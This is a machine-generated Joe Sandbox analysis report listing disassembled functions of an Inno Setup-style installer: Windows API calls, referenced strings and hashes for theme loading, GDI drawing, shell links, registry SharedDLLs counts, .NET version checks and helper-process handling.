                                                                                                                                        • Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                                                                        • Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
                                                                                                                                        • Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                                                                        • Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2505057540.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2505033769.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2505084610.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10000000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                                                                        • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                                                                                                                        • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0044B604: GetVersionExA.KERNEL32(00000094), ref: 0044B621
                                                                                                                                        • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498BF2), ref: 0044B67F
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6BB
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6CD
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6DF
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6F1
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B703
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B715
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B727
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B739
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B74B
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B75D
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B76F
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B781
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B793
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7A5
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7B7
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B7C9
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B7DB
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B7ED
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B7FF
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B811
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B823
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B835
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B847
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B859
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B86B
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B87D
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B88F
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B8A1
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B8B3
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B8C5
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B8D7
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B8E9
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B8FB
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B90D
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B91F
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B931
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B943
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B955
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B967
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B979
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B98B
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B99D
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B9AF
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B9C1
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B9D3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$LibraryLoadVersion
                                                                                                                                        • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                                                                                        • API String ID: 1968650500-2910565190
                                                                                                                                        • Opcode ID: 4248c38413e99d9464b79edb7fe9b1fdc4fa56b35b8262d24df0eec612bb70b6
                                                                                                                                        • Instruction ID: e93aa9000a3b975727f71862fff1c9a8a52c50bca2d3d110ef64c9f3a3b13d35
                                                                                                                                        • Opcode Fuzzy Hash: 4248c38413e99d9464b79edb7fe9b1fdc4fa56b35b8262d24df0eec612bb70b6
                                                                                                                                        • Instruction Fuzzy Hash: D391A8F0A40B11ABEB00EFB5AD96A2A3BA8EB15714310067BB454DF295D778DC108FDD
                                                                                                                                        APIs
                                                                                                                                        • GetDC.USER32(00000000), ref: 0041CA40
                                                                                                                                        • CreateCompatibleDC.GDI32(?), ref: 0041CA4C
                                                                                                                                        • CreateBitmap.GDI32(0041A944,?,00000001,00000001,00000000), ref: 0041CA70
                                                                                                                                        • CreateCompatibleBitmap.GDI32(?,0041A944,?), ref: 0041CA80
                                                                                                                                        • SelectObject.GDI32(0041CE3C,00000000), ref: 0041CA9B
                                                                                                                                        • FillRect.USER32(0041CE3C,?,?), ref: 0041CAD6
                                                                                                                                        • SetTextColor.GDI32(0041CE3C,00000000), ref: 0041CAEB
                                                                                                                                        • SetBkColor.GDI32(0041CE3C,00000000), ref: 0041CB02
                                                                                                                                        • PatBlt.GDI32(0041CE3C,00000000,00000000,0041A944,?,00FF0062), ref: 0041CB18
                                                                                                                                        • CreateCompatibleDC.GDI32(?), ref: 0041CB2B
                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0041CB5C
                                                                                                                                        • SelectPalette.GDI32(00000000,00000000,00000001), ref: 0041CB74
                                                                                                                                        • RealizePalette.GDI32(00000000), ref: 0041CB7D
                                                                                                                                        • SelectPalette.GDI32(0041CE3C,00000000,00000001), ref: 0041CB8C
                                                                                                                                        • RealizePalette.GDI32(0041CE3C), ref: 0041CB95
• SetTextColor.GDI32(00000000,00000000), ref: 0041CBAE
• SetBkColor.GDI32(00000000,00000000), ref: 0041CBC5
• BitBlt.GDI32(0041CE3C,00000000,00000000,0041A944,?,00000000,00000000,00000000,00CC0020), ref: 0041CBE1
• SelectObject.GDI32(00000000,?), ref: 0041CBEE
• DeleteDC.GDI32(00000000), ref: 0041CC04
  • Part of subcall function 0041A058: GetSysColor.USER32(?), ref: 0041A062
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: ColorSelect$CreatePalette$CompatibleObject$BitmapRealizeText$DeleteFillRect
• String ID:
• API String ID: 269503290-0
APIs
• CoCreateInstance.OLE32(00499A74,00000000,00000001,00499774,?,00000000,004569E3), ref: 0045667E
• CoCreateInstance.OLE32(00499764,00000000,00000001,00499774,?,00000000,004569E3), ref: 004566A4
• SysFreeString.OLEAUT32(00000000), ref: 0045685B
Strings
• IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning), xrefs: 004567F1
• IShellLink::QueryInterface(IID_IPropertyStore), xrefs: 004567BD
• IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall), xrefs: 00456892
• IPropertyStore::SetValue(PKEY_AppUserModel_ID), xrefs: 00456840
• {pf32}\, xrefs: 0045671E
• %ProgramFiles(x86)%\, xrefs: 0045672E
• IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption), xrefs: 004568CA
• CoCreateInstance, xrefs: 004566AF
• IShellLink::QueryInterface(IID_IPersistFile), xrefs: 00456904
• IPersistFile::Save, xrefs: 00456962
• IPropertyStore::Commit, xrefs: 004568E3
Similarity
• API ID: CreateInstance$FreeString
• String ID: %ProgramFiles(x86)%\$CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)$IPropertyStore::SetValue(PKEY_AppUserModel_ID)$IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)$IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption)$IShellLink::QueryInterface(IID_IPersistFile)$IShellLink::QueryInterface(IID_IPropertyStore)${pf32}\
• API String ID: 308859552-2363233914
APIs
• ShowWindow.USER32(?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000,?,00498B1F,00000000,00498B29,?,00000000), ref: 00498453
• CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000,?,00498B1F,00000000), ref: 00498466
• ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000), ref: 00498476
• MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00498497
• ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000), ref: 004984A7
  • Part of subcall function 0042D44C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4DA,?,?,?,00000001,?,0045607E,00000000,004560E6), ref: 0042D481
Similarity
• API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
• String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
• API String ID: 2000705611-3672972446
APIs
• GetLastError.KERNEL32(00000000,0045A994,?,?,?,?,?,00000006,?,00000000,0049785D,?,00000000,00497900), ref: 0045A846
Similarity
• API ID: ErrorLast
• String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
• API String ID: 1452528299-3112430753
APIs
• GetVersion.KERNEL32 ref: 0045CBDA
• GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045CBFA
• GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045CC07
• GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045CC14
• GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045CC22
  • Part of subcall function 0045CAC8: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045CB67,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045CB41
• AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CE15,?,?,00000000), ref: 0045CCDB
• GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CE15,?,?,00000000), ref: 0045CCE4
Similarity
• API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
• String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
• API String ID: 59345061-4263478283
APIs
• CreateCompatibleDC.GDI32(00000000), ref: 0041B3C3
• CreateCompatibleDC.GDI32(00000000), ref: 0041B3CD
• GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3DF
• CreateBitmap.GDI32(0000000B,?,00000001,00000001,00000000), ref: 0041B3F6
• GetDC.USER32(00000000), ref: 0041B402
• CreateCompatibleBitmap.GDI32(00000000,0000000B,?), ref: 0041B42F
• ReleaseDC.USER32(00000000,00000000), ref: 0041B455
• SelectObject.GDI32(00000000,?), ref: 0041B470
• SelectObject.GDI32(?,00000000), ref: 0041B47F
• StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4AB
• SelectObject.GDI32(00000000,00000000), ref: 0041B4B9
• SelectObject.GDI32(?,00000000), ref: 0041B4C7
• DeleteDC.GDI32(00000000), ref: 0041B4D0
• DeleteDC.GDI32(?), ref: 0041B4D9
Similarity
• API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
• String ID:
• API String ID: 644427674-0
APIs
  • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
• WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00472D00
• SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00472E07
• SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 00472E1D
• SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00472E42
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
• String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
• API String ID: 971782779-3668018701
• Opcode ID: 2d89b570042f54901974877e938fd47b21837ccabee8972bdab534961fdf4a04
• Instruction ID: 7edda302242157afef40b0e7c7e05039b068dedd9e36cd510e855ba872eb221a
• Opcode Fuzzy Hash: 2d89b570042f54901974877e938fd47b21837ccabee8972bdab534961fdf4a04
• Instruction Fuzzy Hash: D0D14574A001489FDB11EFA9D981BDDBBF4AF08304F50816AF904B7392C778AE45CB69
APIs
  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
• RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,?,00000000,?,00000000,00454B0D,?,0045AB6A,00000003,00000000,00000000,00454B44), ref: 0045498D
  • Part of subcall function 0042E8C8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
• RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,00000000,?,00000004,00000000,00454A57,?,0045AB6A,00000000,00000000,?,00000000,?,00000000), ref: 00454A11
• RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,00000000,?,00000004,00000000,00454A57,?,0045AB6A,00000000,00000000,?,00000000,?,00000000), ref: 00454A40
Strings
• , xrefs: 004548FE
• Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548AB
• Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548E4
• RegOpenKeyEx, xrefs: 00454910
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: QueryValue$FormatMessageOpen
• String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
• API String ID: 2812809588-1577016196
• Opcode ID: 742d62a6869efcab47093dbd07b67c32618791e42156db71d55ecd28429abb8c
• Instruction ID: 3b35aed17da8244e85d272d2923899a44a2159637523a8fd9e70e85f8d21f96a
• Opcode Fuzzy Hash: 742d62a6869efcab47093dbd07b67c32618791e42156db71d55ecd28429abb8c
• Instruction Fuzzy Hash: 23914871E44148ABDB10DF95C842BDEB7FCEB49309F50406BF900FB282D6789E458B69
APIs
  • Part of subcall function 00459364: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004594A1,00000000,00459659,?,00000000,00000000,00000000), ref: 004593B1
• RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 004594FF
• RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 00459569
  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
• RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 004595D0
Strings
• v2.0.50727, xrefs: 0045955B
• v1.1.4322, xrefs: 004595C2
• SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 00459583
• .NET Framework version %s not found, xrefs: 00459609
• .NET Framework not found, xrefs: 0045961D
• SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 004594B2
• v4.0.30319, xrefs: 004594F1
• SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 0045951C
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: Close$Open
• String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
• API String ID: 2976201327-446240816
• Opcode ID: 06cdcde3b802fa8939e5b925d5f0cc04c3aa7329a2dd441772a6abba54712f42
• Instruction ID: e7879d346446e6db82ad1067b50e8ffdd52b59a139ce3e0e88c8f748029a0227
• Opcode Fuzzy Hash: 06cdcde3b802fa8939e5b925d5f0cc04c3aa7329a2dd441772a6abba54712f42
• Instruction Fuzzy Hash: EB51A331A04148EBCB01DFA8C8A1BEE77A5DB59305F54447BA801DB353EA3D9E1ECB19
APIs
• CloseHandle.KERNEL32(?), ref: 00458A7B
• TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00458A97
• WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00458AA5
• GetExitCodeProcess.KERNEL32(?), ref: 00458AB6
• CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458AFD
• Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458B19
Strings
• Helper process exited, but failed to get exit code., xrefs: 00458AEF
• Helper process exited with failure code: 0x%x, xrefs: 00458AE3
• Helper isn't responding; killing it., xrefs: 00458A87
• Helper process exited., xrefs: 00458AC5
• Stopping 64-bit helper process. (PID: %u), xrefs: 00458A6D
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
• String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
• API String ID: 3355656108-1243109208
• Opcode ID: 5acb86a21610ff93fc26a18ca7688f4a609edf5baed34ffefeefbdc5f868b4c1
• Instruction ID: 3f2324d87e707cedf1d5c4e10b6e93e7b0b52df74c864805f1ac214018e434b5
• Opcode Fuzzy Hash: 5acb86a21610ff93fc26a18ca7688f4a609edf5baed34ffefeefbdc5f868b4c1
• Instruction Fuzzy Hash: 2F2130706087409AD720E779C44575BB6D49F08345F04CC2FF99AEB283DF78E8488B2A
APIs
  • Part of subcall function 0042DDE4: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE10
• RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,004546FF,?,00000000,004547C3), ref: 0045464F
• RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,004546FF,?,00000000,004547C3), ref: 0045478B
  • Part of subcall function 0042E8C8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
Strings
• Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454567
• RegCreateKeyEx, xrefs: 004545C3
• Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454597
• , xrefs: 004545B1
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: CloseCreateFormatMessageQueryValue
• String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
• API String ID: 2481121983-1280779767
• Opcode ID: 1658ad98f5d652d8ab18f870bc50976d397f5a9f15be4283fc870004d2c294f4
• Instruction ID: 93c55a0ab54dbcba353dd8d7ef9dbdddde8d62e860aeeeeaccb8ee2ace91ec52
• Opcode Fuzzy Hash: 1658ad98f5d652d8ab18f870bc50976d397f5a9f15be4283fc870004d2c294f4
• Instruction Fuzzy Hash: 49810F75A00209AFDB00DFD5C981BDEB7B8EB49309F10452AF900FB282D7789E45CB69
APIs
  • Part of subcall function 004538BC: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539AB
  • Part of subcall function 004538BC: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539BB
• CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00496CCD
• SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00496E21), ref: 00496CEE
• CreateWindowExA.USER32(00000000,STATIC,00496E30,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00496D15
• SetWindowLongA.USER32(?,000000FC,004964A8), ref: 00496D28
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000,STATIC,00496E30), ref: 00496D58
• MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00496DCC
